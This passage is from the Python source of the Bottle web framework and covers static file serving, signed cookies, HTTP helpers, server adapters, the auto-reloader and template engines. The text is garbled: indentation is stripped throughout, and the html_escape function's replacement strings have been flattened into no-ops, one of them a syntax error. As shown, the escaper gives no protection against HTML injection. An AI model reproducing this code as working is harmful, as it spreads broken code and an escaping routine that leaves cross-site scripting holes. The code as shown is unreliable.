Whitespace is replaced by a single dash. Leading or tailing dots
or dashes are removed. The filename is limited to 255 characters.
"""
fname = self.raw_filename
if not isinstance(fname, unicode):
fname = fname.decode('utf8', 'ignore')
fname = normalize('NFKD', fname).encode('ASCII', 'ignore').decode('ASCII')
fname = os.path.basename(fname.replace('\\', os.path.sep))
fname = re.sub(r'[^a-zA-Z0-9-_.\s]', '', fname).strip()
fname = re.sub(r'[-\s]+', '-', fname).strip('.-')
return fname[:255] or 'empty'
def _copy_file(self, fp, chunk_size=2**16):
read, write, offset = self.file.read, fp.write, self.file.tell()
while 1:
buf = read(chunk_size)
if not buf: break
write(buf)
self.file.seek(offset)
def save(self, destination, overwrite=False, chunk_size=2**16):
""" Save file to disk or copy its content to an open file(-like) object.
If *destination* is a directory, :attr:`filename` is added to the
path. Existing files are not overwritten by default (IOError).
:param destination: File path, directory or file(-like) object.
:param overwrite: If True, replace existing files. (default: False)
:param chunk_size: Bytes to read at a time. (default: 64kb)
"""
if isinstance(destination, basestring): # Except file-likes here
if os.path.isdir(destination):
destination = os.path.join(destination, self.filename)
if not overwrite and os.path.exists(destination):
raise IOError('File exists.')
with open(destination, 'wb') as fp:
self._copy_file(fp, chunk_size)
else:
self._copy_file(destination, chunk_size)
###############################################################################
# Application Helper ###########################################################
###############################################################################
def abort(code=500, text='Unknown Error.'):
""" Aborts execution and causes a HTTP error. """
raise HTTPError(code, text)
def redirect(url, code=None):
""" Aborts execution and causes a 303 or 302 redirect, depending on
the HTTP protocol version. """
if not code:
code = 303 if request.get('SERVER_PROTOCOL') == "HTTP/1.1" else 302
res = response.copy(cls=HTTPResponse)
res.status = code
res.body = ""
res.set_header('Location', urljoin(request.url, url))
raise res
def _file_iter_range(fp, offset, bytes, maxread=1024*1024):
""" Yield chunks from a range in a file. No chunk is bigger than maxread."""
fp.seek(offset)
while bytes > 0:
part = fp.read(min(bytes, maxread))
if not part: break
bytes -= len(part)
yield part
def static_file(filename, root, mimetype='auto', download=False, charset='UTF-8'):
""" Open a file in a safe way and return :exc:`HTTPResponse` with status
code 200, 305, 403 or 404. The ``Content-Type``, ``Content-Encoding``,
``Content-Length`` and ``Last-Modified`` headers are set if possible.
Special support for ``If-Modified-Since``, ``Range`` and ``HEAD``
requests.
:param filename: Name or path of the file to send.
:param root: Root path for file lookups. Should be an absolute directory
path.
:param mimetype: Defines the content-type header (default: guess from
file extension)
:param download: If True, ask the browser to open a `Save as...` dialog
instead of opening the file with the associated program. You can
specify a custom filename as a string. If not specified, the
original filename is used (default: False).
:param charset: The charset to use for files with a ``text/*``
mime-type. (default: UTF-8)
"""
root = os.path.abspath(root) + os.sep
filename = os.path.abspath(os.path.join(root, filename.strip('/\\')))
headers = dict()
if not filename.startswith(root):
return HTTPError(403, "Access denied.")
if not os.path.exists(filename) or not os.path.isfile(filename):
return HTTPError(404, "File does not exist.")
if not os.access(filename, os.R_OK):
return HTTPError(403, "You do not have permission to access this file.")
if mimetype == 'auto':
mimetype, encoding = mimetypes.guess_type(filename)
if encoding: headers['Content-Encoding'] = encoding
if mimetype:
if mimetype[:5] == 'text/' and charset and 'charset' not in mimetype:
mimetype += '; charset=%s' % charset
headers['Content-Type'] = mimetype
if download:
download = os.path.basename(filename if download == True else download)
headers['Content-Disposition'] = 'attachment; filename="%s"' % download
stats = os.stat(filename)
headers['Content-Length'] = clen = stats.st_size
lm = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime(stats.st_mtime))
headers['Last-Modified'] = lm
ims = request.environ.get('HTTP_IF_MODIFIED_SINCE')
if ims:
ims = parse_date(ims.split(";")[0].strip())
if ims is not None and ims >= int(stats.st_mtime):
headers['Date'] = time.strftime("%a, %d %b %Y %H:%M:%S GMT", time.gmtime())
return HTTPResponse(status=304, **headers)
body = '' if request.method == 'HEAD' else open(filename, 'rb')
headers["Accept-Ranges"] = "bytes"
ranges = request.environ.get('HTTP_RANGE')
if 'HTTP_RANGE' in request.environ:
ranges = list(parse_range_header(request.environ['HTTP_RANGE'], clen))
if not ranges:
return HTTPError(416, "Requested Range Not Satisfiable")
offset, end = ranges[0]
headers["Content-Range"] = "bytes %d-%d/%d" % (offset, end-1, clen)
headers["Content-Length"] = str(end-offset)
if body: body = _file_iter_range(body, offset, end-offset)
return HTTPResponse(body, status=206, **headers)
return HTTPResponse(body, **headers)
###############################################################################
# HTTP Utilities and MISC (TODO) ###############################################
###############################################################################
def debug(mode=True):
""" Change the debug level.
There is only one debug level supported at the moment."""
global DEBUG
if mode: warnings.simplefilter('default')
DEBUG = bool(mode)
def http_date(value):
if isinstance(value, (datedate, datetime)):
value = value.utctimetuple()
elif isinstance(value, (int, float)):
value = time.gmtime(value)
if not isinstance(value, basestring):
value = time.strftime("%a, %d %b %Y %H:%M:%S GMT", value)
return value
def parse_date(ims):
""" Parse rfc1123, rfc850 and asctime timestamps and return UTC epoch. """
try:
ts = email.utils.parsedate_tz(ims)
return time.mktime(ts[:8] + (0,)) - (ts[9] or 0) - time.timezone
except (TypeError, ValueError, IndexError, OverflowError):
return None
def parse_auth(header):
""" Parse rfc2617 HTTP authentication header string (basic) and return (user,pass) tuple or None"""
try:
method, data = header.split(None, 1)
if method.lower() == 'basic':
user, pwd = touni(base64.b64decode(tob(data))).split(':',1)
return user, pwd
except (KeyError, ValueError):
return None
def parse_range_header(header, maxlen=0):
""" Yield (start, end) ranges parsed from a HTTP Range header. Skip
unsatisfiable ranges. The end index is non-inclusive."""
if not header or header[:6] != 'bytes=': return
ranges = [r.split('-', 1) for r in header[6:].split(',') if '-' in r]
for start, end in ranges:
try:
if not start: # bytes=-100 -> last 100 bytes
start, end = max(0, maxlen-int(end)), maxlen
elif not end: # bytes=100- -> all but the first 99 bytes
start, end = int(start), maxlen
else: # bytes=100-200 -> bytes 100-200 (inclusive)
start, end = int(start), min(int(end)+1, maxlen)
if 0 <= start < end <= maxlen:
yield start, end
except ValueError:
pass
def _parse_qsl(qs):
r = []
for pair in qs.replace(';','&').split('&'):
if not pair: continue
nv = pair.split('=', 1)
if len(nv) != 2: nv.append('')
key = urlunquote(nv[0].replace('+', ' '))
value = urlunquote(nv[1].replace('+', ' '))
r.append((key, value))
return r
def _lscmp(a, b):
""" Compares two strings in a cryptographically safe way:
Runtime is not affected by length of common prefix. """
return not sum(0 if x==y else 1 for x, y in zip(a, b)) and len(a) == len(b)
def cookie_encode(data, key):
""" Encode and sign a pickle-able object. Return a (byte) string """
msg = base64.b64encode(pickle.dumps(data, -1))
sig = base64.b64encode(hmac.new(tob(key), msg).digest())
return tob('!') + sig + tob('?') + msg
def cookie_decode(data, key):
""" Verify and decode an encoded string. Return an object or None."""
data = tob(data)
if cookie_is_encoded(data):
sig, msg = data.split(tob('?'), 1)
if _lscmp(sig[1:], base64.b64encode(hmac.new(tob(key), msg).digest())):
return pickle.loads(base64.b64decode(msg))
return None
def cookie_is_encoded(data):
""" Return True if the argument looks like a encoded cookie."""
return bool(data.startswith(tob('!')) and tob('?') in data)
def html_escape(string):
""" Escape HTML special characters ``&<>`` and quotes ``'"``. """
return string.replace('&','&').replace('<','<').replace('>','>')\
.replace('"','"').replace("'",''')
def html_quote(string):
""" Escape and quote a string to be used as an HTTP attribute."""
return '"%s"' % html_escape(string).replace('\n',' ')\
.replace('\r',' ').replace('\t','	')
def yieldroutes(func):
""" Return a generator for routes that match the signature (name, args)
of the func parameter. This may yield more than one route if the function
takes optional keyword arguments. The output is best described by example::
a() -> '/a'
b(x, y) -> '/b/<x>/<y>'
c(x, y=5) -> '/c/<x>' and '/c/<x>/<y>'
d(x=5, y=6) -> '/d' and '/d/<x>' and '/d/<x>/<y>'
"""
path = '/' + func.__name__.replace('__','/').lstrip('/')
spec = getargspec(func)
argc = len(spec[0]) - len(spec[3] or [])
path += ('/<%s>' * argc) % tuple(spec[0][:argc])
yield path
for arg in spec[0][argc:]:
path += '/<%s>' % arg
yield path
def path_shift(script_name, path_info, shift=1):
""" Shift path fragments from PATH_INFO to SCRIPT_NAME and vice versa.
:return: The modified paths.
:param script_name: The SCRIPT_NAME path.
:param script_name: The PATH_INFO path.
:param shift: The number of path fragments to shift. May be negative to
change the shift direction. (default: 1)
"""
if shift == 0: return script_name, path_info
pathlist = path_info.strip('/').split('/')
scriptlist = script_name.strip('/').split('/')
if pathlist and pathlist[0] == '': pathlist = []
if scriptlist and scriptlist[0] == '': scriptlist = []
if 0 < shift <= len(pathlist):
moved = pathlist[:shift]
scriptlist = scriptlist + moved
pathlist = pathlist[shift:]
elif 0 > shift >= -len(scriptlist):
moved = scriptlist[shift:]
pathlist = moved + pathlist
scriptlist = scriptlist[:shift]
else:
empty = 'SCRIPT_NAME' if shift < 0 else 'PATH_INFO'
raise AssertionError("Cannot shift. Nothing left from %s" % empty)
new_script_name = '/' + '/'.join(scriptlist)
new_path_info = '/' + '/'.join(pathlist)
if path_info.endswith('/') and pathlist: new_path_info += '/'
return new_script_name, new_path_info
def auth_basic(check, realm="private", text="Access denied"):
""" Callback decorator to require HTTP auth (basic).
TODO: Add route(check_auth=...) parameter. """
def decorator(func):
@functools.wraps(func)
def wrapper(*a, **ka):
user, password = request.auth or (None, None)
if user is None or not check(user, password):
err = HTTPError(401, text)
err.add_header('WWW-Authenticate', 'Basic realm="%s"' % realm)
return err
return func(*a, **ka)
return wrapper
return decorator
# Shortcuts for common Bottle methods.
# They all refer to the current default application.
def make_default_app_wrapper(name):
""" Return a callable that relays calls to the current default app. """
@functools.wraps(getattr(Bottle, name))
def wrapper(*a, **ka):
return getattr(app(), name)(*a, **ka)
return wrapper
route = make_default_app_wrapper('route')
get = make_default_app_wrapper('get')
post = make_default_app_wrapper('post')
put = make_default_app_wrapper('put')
delete = make_default_app_wrapper('delete')
patch = make_default_app_wrapper('patch')
error = make_default_app_wrapper('error')
mount = make_default_app_wrapper('mount')
hook = make_default_app_wrapper('hook')
install = make_default_app_wrapper('install')
uninstall = make_default_app_wrapper('uninstall')
url = make_default_app_wrapper('get_url')
###############################################################################
# Server Adapter ###############################################################
###############################################################################
class ServerAdapter(object):
quiet = False
def __init__(self, host='127.0.0.1', port=8080, **options):
self.options = options
self.host = host
self.port = int(port)
def run(self, handler): # pragma: no cover
pass
def __repr__(self):
args = ', '.join(['%s=%s'%(k,repr(v)) for k, v in self.options.items()])
return "%s(%s)" % (self.__class__.__name__, args)
class CGIServer(ServerAdapter):
quiet = True
def run(self, handler): # pragma: no cover
from wsgiref.handlers import CGIHandler
def fixed_environ(environ, start_response):
environ.setdefault('PATH_INFO', '')
return handler(environ, start_response)
CGIHandler().run(fixed_environ)
class FlupFCGIServer(ServerAdapter):
def run(self, handler): # pragma: no cover
import flup.server.fcgi
self.options.setdefault('bindAddress', (self.host, self.port))
flup.server.fcgi.WSGIServer(handler, **self.options).run()
class WSGIRefServer(ServerAdapter):
def run(self, app): # pragma: no cover
from wsgiref.simple_server import make_server
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
import socket
class FixedHandler(WSGIRequestHandler):
def address_string(self): # Prevent reverse DNS lookups please.
return self.client_address[0]
def log_request(*args, **kw):
if not self.quiet:
return WSGIRequestHandler.log_request(*args, **kw)
handler_cls = self.options.get('handler_class', FixedHandler)
server_cls = self.options.get('server_class', WSGIServer)
if ':' in self.host: # Fix wsgiref for IPv6 addresses.
if getattr(server_cls, 'address_family') == socket.AF_INET:
class server_cls(server_cls):
address_family = socket.AF_INET6
self.srv = make_server(self.host, self.port, app, server_cls, handler_cls)
self.port = self.srv.server_port # update port actual port (0 means random)
try:
self.srv.serve_forever()
except KeyboardInterrupt:
self.srv.server_close() # Prevent ResourceWarning: unclosed socket
raise
class CherryPyServer(ServerAdapter):
def run(self, handler): # pragma: no cover
from cherrypy import wsgiserver
self.options['bind_addr'] = (self.host, self.port)
self.options['wsgi_app'] = handler
certfile = self.options.get('certfile')
if certfile:
del self.options['certfile']
keyfile = self.options.get('keyfile')
if keyfile:
del self.options['keyfile']
server = wsgiserver.CherryPyWSGIServer(**self.options)
if certfile:
server.ssl_certificate = certfile
if keyfile:
server.ssl_private_key = keyfile
try:
server.start()
finally:
server.stop()
class WaitressServer(ServerAdapter):
def run(self, handler):
from waitress import serve
serve(handler, host=self.host, port=self.port)
class PasteServer(ServerAdapter):
def run(self, handler): # pragma: no cover
from paste import httpserver
from paste.translogger import TransLogger
handler = TransLogger(handler, setup_console_handler=(not self.quiet))
httpserver.serve(handler, host=self.host, port=str(self.port),
**self.options)
class MeinheldServer(ServerAdapter):
def run(self, handler):
from meinheld import server
server.listen((self.host, self.port))
server.run(handler)
class FapwsServer(ServerAdapter):
""" Extremely fast webserver using libev. See http://www.fapws.org/ """
def run(self, handler): # pragma: no cover
import fapws._evwsgi as evwsgi
from fapws import base, config
port = self.port
if float(config.SERVER_IDENT[-2:]) > 0.4:
# fapws3 silently changed its API in 0.5
port = str(port)
evwsgi.start(self.host, port)
# fapws3 never releases the GIL. Complain upstream. I tried. No luck.
if 'BOTTLE_CHILD' in os.environ and not self.quiet:
_stderr("WARNING: Auto-reloading does not work with Fapws3.\n")
_stderr(" (Fapws3 breaks python thread support)\n")
evwsgi.set_base_module(base)
def app(environ, start_response):
environ['wsgi.multiprocess'] = False
return handler(environ, start_response)
evwsgi.wsgi_cb(('', app))
evwsgi.run()
class TornadoServer(ServerAdapter):
""" The super hyped asynchronous server by facebook. Untested. """
def run(self, handler): # pragma: no cover
import tornado.wsgi, tornado.httpserver, tornado.ioloop
container = tornado.wsgi.WSGIContainer(handler)
server = tornado.httpserver.HTTPServer(container)
server.listen(port=self.port,address=self.host)
tornado.ioloop.IOLoop.instance().start()
class AppEngineServer(ServerAdapter):
""" Adapter for Google App Engine. """
quiet = True
def run(self, handler):
from google.appengine.ext.webapp import util
# A main() function in the handler script enables 'App Caching'.
# Lets makes sure it is there. This _really_ improves performance.
module = sys.modules.get('__main__')
if module and not hasattr(module, 'main'):
module.main = lambda: util.run_wsgi_app(handler)
util.run_wsgi_app(handler)
class TwistedServer(ServerAdapter):
""" Untested. """
def run(self, handler):
from twisted.web import server, wsgi
from twisted.python.threadpool import ThreadPool
from twisted.internet import reactor
thread_pool = ThreadPool()
thread_pool.start()
reactor.addSystemEventTrigger('after', 'shutdown', thread_pool.stop)
factory = server.Site(wsgi.WSGIResource(reactor, thread_pool, handler))
reactor.listenTCP(self.port, factory, interface=self.host)
if not reactor.running:
reactor.run()
class DieselServer(ServerAdapter):
""" Untested. """
def run(self, handler):
from diesel.protocols.wsgi import WSGIApplication
app = WSGIApplication(handler, port=self.port)
app.run()
class GeventServer(ServerAdapter):
""" Untested. Options:
* `fast` (default: False) uses libevent's http server, but has some
issues: No streaming, no pipelining, no SSL.
* See gevent.wsgi.WSGIServer() documentation for more options.
"""
def run(self, handler):
from gevent import wsgi, pywsgi, local
if not isinstance(threading.local(), local.local):
msg = "Bottle requires gevent.monkey.patch_all() (before import)"
raise RuntimeError(msg)
if not self.options.pop('fast', None): wsgi = pywsgi
self.options['log'] = None if self.quiet else 'default'
address = (self.host, self.port)
server = wsgi.WSGIServer(address, handler, **self.options)
if 'BOTTLE_CHILD' in os.environ:
import signal
signal.signal(signal.SIGINT, lambda s, f: server.stop())
server.serve_forever()
class GeventSocketIOServer(ServerAdapter):
def run(self,handler):
from socketio import server
address = (self.host, self.port)
server.SocketIOServer(address, handler, **self.options).serve_forever()
class GunicornServer(ServerAdapter):
""" Untested. See http://gunicorn.org/configure.html for options. """
def run(self, handler):
from gunicorn.app.base import Application
config = {'bind': "%s:%d" % (self.host, int(self.port))}
config.update(self.options)
class GunicornApplication(Application):
def init(self, parser, opts, args):
return config
def load(self):
return handler
GunicornApplication().run()
class EventletServer(ServerAdapter):
""" Untested. Options:
* `backlog` adjust the eventlet backlog parameter which is the maximum
number of queued connections. Should be at least 1; the maximum
value is system-dependent.
* `family`: (default is 2) socket family, optional. See socket
documentation for available families.
"""
def run(self, handler):
from eventlet import wsgi, listen, patcher
if not patcher.is_monkey_patched(os):
msg = "Bottle requires eventlet.monkey_patch() (before import)"
raise RuntimeError(msg)
socket_args = {}
for arg in ('backlog', 'family'):
try:
socket_args[arg] = self.options.pop(arg)
except KeyError:
pass
address = (self.host, self.port)
try:
wsgi.server(listen(address, **socket_args), handler,
log_output=(not self.quiet))
except TypeError:
# Fallback, if we have old version of eventlet
wsgi.server(listen(address), handler)
class RocketServer(ServerAdapter):
""" Untested. """
def run(self, handler):
from rocket import Rocket
server = Rocket((self.host, self.port), 'wsgi', { 'wsgi_app' : handler })
server.start()
class BjoernServer(ServerAdapter):
""" Fast server written in C: https://github.com/jonashaag/bjoern """
def run(self, handler):
from bjoern import run
run(handler, self.host, self.port)
class AutoServer(ServerAdapter):
""" Untested. """
adapters = [WaitressServer, PasteServer, TwistedServer, CherryPyServer, WSGIRefServer]
def run(self, handler):
for sa in self.adapters:
try:
return sa(self.host, self.port, **self.options).run(handler)
except ImportError:
pass
server_names = {
'cgi': CGIServer,
'flup': FlupFCGIServer,
'wsgiref': WSGIRefServer,
'waitress': WaitressServer,
'cherrypy': CherryPyServer,
'paste': PasteServer,
'fapws3': FapwsServer,
'tornado': TornadoServer,
'gae': AppEngineServer,
'twisted': TwistedServer,
'diesel': DieselServer,
'meinheld': MeinheldServer,
'gunicorn': GunicornServer,
'eventlet': EventletServer,
'gevent': GeventServer,
'geventSocketIO':GeventSocketIOServer,
'rocket': RocketServer,
'bjoern' : BjoernServer,
'auto': AutoServer,
}
###############################################################################
# Application Control ##########################################################
###############################################################################
def load(target, **namespace):
""" Import a module or fetch an object from a module.
* ``package.module`` returns `module` as a module object.
* ``pack.mod:name`` returns the module variable `name` from `pack.mod`.
* ``pack.mod:func()`` calls `pack.mod.func()` and returns the result.
The last form accepts not only function calls, but any type of
expression. Keyword arguments passed to this function are available as
local variables. Example: ``import_string('re:compile(x)', x='[a-z]')``
"""
module, target = target.split(":", 1) if ':' in target else (target, None)
if module not in sys.modules: __import__(module)
if not target: return sys.modules[module]
if target.isalnum(): return getattr(sys.modules[module], target)
package_name = module.split('.')[0]
namespace[package_name] = sys.modules[package_name]
return eval('%s.%s' % (module, target), namespace)
def load_app(target):
""" Load a bottle application from a module and make sure that the import
does not affect the current default application, but returns a separate
application object. See :func:`load` for the target parameter. """
global NORUN; NORUN, nr_old = True, NORUN
tmp = default_app.push() # Create a new "default application"
try:
rv = load(target) # Import the target module
return rv if callable(rv) else tmp
finally:
default_app.remove(tmp) # Remove the temporary added default application
NORUN = nr_old
_debug = debug
def run(app=None, server='wsgiref', host='127.0.0.1', port=8080,
interval=1, reloader=False, quiet=False, plugins=None,
debug=None, **kargs):
""" Start a server instance. This method blocks until the server terminates.
:param app: WSGI application or target string supported by
:func:`load_app`. (default: :func:`default_app`)
:param server: Server adapter to use. See :data:`server_names` keys
for valid names or pass a :class:`ServerAdapter` subclass.
(default: `wsgiref`)
:param host: Server address to bind to. Pass ``0.0.0.0`` to listens on
all interfaces including the external one. (default: 127.0.0.1)
:param port: Server port to bind to. Values below 1024 require root
privileges. (default: 8080)
:param reloader: Start auto-reloading server? (default: False)
:param interval: Auto-reloader interval in seconds (default: 1)
:param quiet: Suppress output to stdout and stderr? (default: False)
:param options: Options passed to the server adapter.
"""
if NORUN: return
if reloader and not os.environ.get('BOTTLE_CHILD'):
lockfile = None
try:
fd, lockfile = tempfile.mkstemp(prefix='bottle.', suffix='.lock')
os.close(fd) # We only need this file to exist. We never write to it
while os.path.exists(lockfile):
args = [sys.executable] + sys.argv
environ = os.environ.copy()
environ['BOTTLE_CHILD'] = 'true'
environ['BOTTLE_LOCKFILE'] = lockfile
p = subprocess.Popen(args, env=environ)
while p.poll() is None: # Busy wait...
os.utime(lockfile, None) # I am alive!
time.sleep(interval)
if p.poll() != 3:
if os.path.exists(lockfile): os.unlink(lockfile)
sys.exit(p.poll())
except KeyboardInterrupt:
pass
finally:
if os.path.exists(lockfile):
os.unlink(lockfile)
return
try:
if debug is not None: _debug(debug)
app = app or default_app()
if isinstance(app, basestring):
app = load_app(app)
if not callable(app):
raise ValueError("Application is not callable: %r" % app)
for plugin in plugins or []:
if isinstance(plugin, basestring):
plugin = load(plugin)
app.install(plugin)
if server in server_names:
server = server_names.get(server)
if isinstance(server, basestring):
server = load(server)
if isinstance(server, type):
server = server(host=host, port=port, **kargs)
if not isinstance(server, ServerAdapter):
raise ValueError("Unknown or unsupported server: %r" % server)
server.quiet = server.quiet or quiet
if not server.quiet:
_stderr("Bottle v%s server starting up (using %s)...\n" % (__version__, repr(server)))
_stderr("Listening on http://%s:%d/\n" % (server.host, server.port))
_stderr("Hit Ctrl-C to quit.\n\n")
if reloader:
lockfile = os.environ.get('BOTTLE_LOCKFILE')
bgcheck = FileCheckerThread(lockfile, interval)
with bgcheck:
server.run(app)
if bgcheck.status == 'reload':
sys.exit(3)
else:
server.run(app)
except KeyboardInterrupt:
pass
except (SystemExit, MemoryError):
raise
except:
if not reloader: raise
if not getattr(server, 'quiet', quiet):
print_exc()
time.sleep(interval)
sys.exit(3)
class FileCheckerThread(threading.Thread):
""" Interrupt main-thread as soon as a changed module file is detected,
the lockfile gets deleted or gets to old. """
def __init__(self, lockfile, interval):
threading.Thread.__init__(self)
self.daemon = True
self.lockfile, self.interval = lockfile, interval
#: Is one of 'reload', 'error' or 'exit'
self.status = None
def run(self):
exists = os.path.exists
mtime = lambda p: os.stat(p).st_mtime
files = dict()
for module in list(sys.modules.values()):
path = getattr(module, '__file__', '')
if path[-4:] in ('.pyo', '.pyc'): path = path[:-1]
if path and exists(path): files[path] = mtime(path)
while not self.status:
if not exists(self.lockfile)\
or mtime(self.lockfile) < time.time() - self.interval - 5:
self.status = 'error'
thread.interrupt_main()
for path, lmtime in list(files.items()):
if not exists(path) or mtime(path) > lmtime:
self.status = 'reload'
thread.interrupt_main()
break
time.sleep(self.interval)
def __enter__(self):
self.start()
def __exit__(self, exc_type, *_):
if not self.status: self.status = 'exit' # silent exit
self.join()
return exc_type is not None and issubclass(exc_type, KeyboardInterrupt)
###############################################################################
# Template Adapters ############################################################
###############################################################################
class TemplateError(HTTPError):
def __init__(self, message):
HTTPError.__init__(self, 500, message)
class BaseTemplate(object):
""" Base class and minimal API for template adapters """
extensions = ['tpl','html','thtml','stpl']
settings = {} #used in prepare()
defaults = {} #used in render()
def __init__(self, source=None, name=None, lookup=None, encoding='utf8', **settings):
""" Create a new template.
If the source parameter (str or buffer) is missing, the name argument
is used to guess a template filename. Subclasses can assume that
self.source and/or self.filename are set. Both are strings.
The lookup, encoding and settings parameters are stored as instance
variables.
The lookup parameter stores a list containing directory paths.
The encoding parameter should be used to decode byte strings or files.
The settings parameter contains a dict for engine-specific settings.
"""
self.name = name
self.source = source.read() if hasattr(source, 'read') else source
self.filename = source.filename if hasattr(source, 'filename') else None
self.lookup = [os.path.abspath(x) for x in lookup] if lookup else []
self.encoding = encoding
self.settings = self.settings.copy() # Copy from class variable
self.settings.update(settings) # Apply
if not self.source and self.name:
self.filename = self.search(self.name, self.lookup)
if not self.filename:
raise TemplateError('Template %s not found.' % repr(name))
if not self.source and not self.filename:
raise TemplateError('No template specified.')
self.prepare(**self.settings)
@classmethod
def search(cls, name, lookup=None):
""" Search name in all directories specified in lookup.
First without, then with common extensions. Return first hit. """
if not lookup:
depr('The template lookup path list should not be empty.', True) #0.12
lookup = ['.']
if os.path.isabs(name) and os.path.isfile(name):
depr('Absolute template path names are deprecated.', True) #0.12
return os.path.abspath(name)
for spath in lookup:
spath = os.path.abspath(spath) + os.sep
fname = os.path.abspath(os.path.join(spath, name))
if not fname.startswith(spath): continue
if os.path.isfile(fname): return fname
for ext in cls.extensions:
if os.path.isfile('%s.%s' % (fname, ext)):
return '%s.%s' % (fname, ext)
@classmethod
def global_config(cls, key, *args):
""" This reads or sets the global settings stored in class.settings. """
if args:
cls.settings = cls.settings.copy() # Make settings local to class
cls.settings[key] = args[0]
else:
return cls.settings[key]
def prepare(self, **options):
""" Run preparations (parsing, caching, ...).
It should be possible to call this again to refresh a template or to
update settings.
"""
raise NotImplementedError
def render(self, *args, **kwargs):
""" Render the template with the specified local variables and return
a single byte or unicode string. If it is a byte string, the encoding
must match self.encoding. This method must be thread-safe!
Local variables may be provided in dictionaries (args)
or directly, as keywords (kwargs).
"""
raise NotImplementedError
class MakoTemplate(BaseTemplate):
def prepare(self, **options):
from mako.template import Template
from mako.lookup import TemplateLookup
options.update({'input_encoding':self.encoding})
options.setdefault('format_exceptions', bool(DEBUG))
lookup = TemplateLookup(directories=self.lookup, **options)
if self.source:
self.tpl = Template(self.source, lookup=lookup, **options)
else:
self.tpl = Template(uri=self.name, filename=self.filename, lookup=lookup, **options)
def render(self, *args, **kwargs):
for dictarg in args: kwargs.update(dictarg)
_defaults = self.defaults.copy()
_defaults.update(kwargs)
return self.tpl.render(**_defaults)
class CheetahTemplate(BaseTemplate):
def prepare(self, **options):
from Cheetah.Template import Template
self.context = threading.local()
self.context.vars = {}
options['searchList'] = [self.context.vars]
if self.source:
self.tpl = Template(source=self.source, **options)
else:
self.tpl = Template(file=self.filename, **options)
def render(self, *args, **kwargs):
for dictarg in args: kwargs.update(dictarg)
self.context.vars.update(self.defaults)
self.context.vars.update(kwargs)
out = str(self.tpl)
self.context.vars.clear()
return out
class Jinja2Template(BaseTemplate):
def prepare(self, filters=None, tests=None, globals={}, **kwargs):
from jinja2 import Environment, FunctionLoader
self.env = Environment(loader=FunctionLoader(self.loader), **kwargs)
if filters: self.env.filters.update(filters)
if tests: self.env.tests.update(tests)
if globals: self.env.globals.update(globals)
if self.source:
self.tpl = self.env.from_string(self.source)
else:
self.tpl = self.env.get_template(self.filename)
def render(self, *args, **kwargs):
for dictarg in args: kwargs.update(dictarg)
_defaults = self.defaults.copy()
_defaults.update(kwargs)
return self.tpl.render(**_defaults)
def loader(self, name):
fname = self.search(name, self.lookup)
if not fname: return
with open(fname, "rb") as f:
return f.read().decode(self.encoding)
class SimpleTemplate(BaseTemplate):
def prepare(self, escape_func=html_escape, noescape=False, syntax=None, **ka):
self.cache = {}
enc = self.encoding
self._str = lambda x: touni(x, enc)
self._escape = lambda x: escape_func(touni(x, enc))
self.syntax = syntax
if noescape:
self._str, self._escape = self._escape, self._str
@cached_property
def co(self):
return compile(self.code, self.filename or '<string>', 'exec')
@cached_property
def code(self):
source = self.source
if not source:
with open(self.filename, 'rb') as f:
source = f.read()
try:
source, encoding = touni(source), 'utf8'
except UnicodeError:
depr('Template encodings other than utf8 are no longer supported.') #0.11
source, encoding = touni(source, 'latin1'), 'latin1'
parser = StplParser(source, encoding=encoding, syntax=self.syntax)
code = parser.translate()
self.encoding = parser.encoding
return code
def _rebase(self, _env, _name=None, **kwargs):
_env['_rebase'] = (_name, kwargs)
def _include(self, _env, _name=None, **kwargs):
env = _env.copy()
env.update(kwargs)
if _name not in self.cache:
self.cache[_name] = self.__class__(name=_name, lookup=self.lookup)
return self.cache[_name].execute(env['_stdout'], env)
def execute(self, _stdout, kwargs):
env = self.defaults.copy()
env.update(kwargs)
env.update({'_stdout': _stdout, '_printlist': _stdout.extend,
'include': functools.partial(self._include, env),
'rebase': functools.partial(self._rebase, env), '_rebase': None,
'_str': self._str, '_escape': self._escape, 'get': env.get,
'setdefault': env.setdefault, 'defined': env.__contains__ })
eval(self.co, env)
if env.get('_rebase'):
subtpl, rargs = env.pop('_rebase')
rargs['base'] = ''.join(_stdout) #copy stdout
del _stdout[:] # clear stdout
return self._include(env, subtpl, **rargs)
return env
def render(self, *args, **kwargs):
""" Render the template using keyword arguments as local variables. """
env = {}; stdout = []
for dictarg in args: env.update(dictarg)
env.update(kwargs)
self.execute(stdout, env)
return ''.join(stdout)
class StplSyntaxError(TemplateError): pass
class StplParser(object):
""" Parser for stpl templates. """
_re_cache = {} #: Cache for compiled re patterns
# This huge pile of voodoo magic splits python code into 8 different tokens.
# 1: All kinds of python strings (trust me, it works)
_re_tok = '((?m)[urbURB]?(?:\'\'(?!\')|""(?!")|\'{6}|"{6}' \
'|\'(?:[^\\\\\']|\\\\.)+?\'|"(?:[^\\\\"]|\\\\.)+?"' \
'|\'{3}(?:[^\\\\]|\\\\.|\\n)+?\'{3}' \
'|"{3}(?:[^\\\\]|\\\\.|\\n)+?"{3}))'
_re_inl = _re_tok.replace('|\\n','') # We re-use this string pattern later
# 2: Comments (until end of line, but not the newline itself)
_re_tok += '|(#.*)'
# 3,4: Keywords that start or continue a python block (only start of line)
_re_tok += '|^([ \\t]*(?:if|for|while|with|try|def|class)\\b)' \
'|^([ \\t]*(?:elif|else|except|finally)\\b)'
# 5: Our special 'end' keyword (but only if it stands alone)
_re_tok += '|((?:^|;)[ \\t]*end[ \\t]*(?=(?:%(block_close)s[ \\t]*)?\\r?$|;|#))'
# 6: A customizable end-of-code-block template token (only end of line)
_re_tok += '|(%(block_close)s[ \\t]*(?=$))'
# 7: And finally, a single newline. The 8th token is 'everything else'
_re_tok += '|(\\r?\\n)'
# Match the start tokens of code areas in a template
_re_split = '(?m)^[ \t]*(\\\\?)((%(line_start)s)|(%(block_start)s))'
# Match inline statements (may contain python strings)
_re_inl = '%%(inline_start)s((?:%s|[^\'"\n]+?)*?)%%(inline_end)s' % _re_inl
default_syntax = '<% %> % {{ }}'
def __init__(self, source, syntax=None, encoding='utf8'):
self.source, self.encoding = touni(source, encoding), encoding
self.set_syntax(syntax or self.default_syntax)
self.code_buffer, self.text_buffer = [], []
self.lineno, self.offset = 1, 0
self.indent, self.indent_mod = 0, 0
def get_syntax(self):
""" Tokens as a space separated string (default: <% %> % {{ }}) """
return self._syntax
def set_syntax(self, syntax):
self._syntax = syntax
self._tokens = syntax.split()
if not syntax in self._re_cache:
names = 'block_start block_close line_start inline_start inline_end'
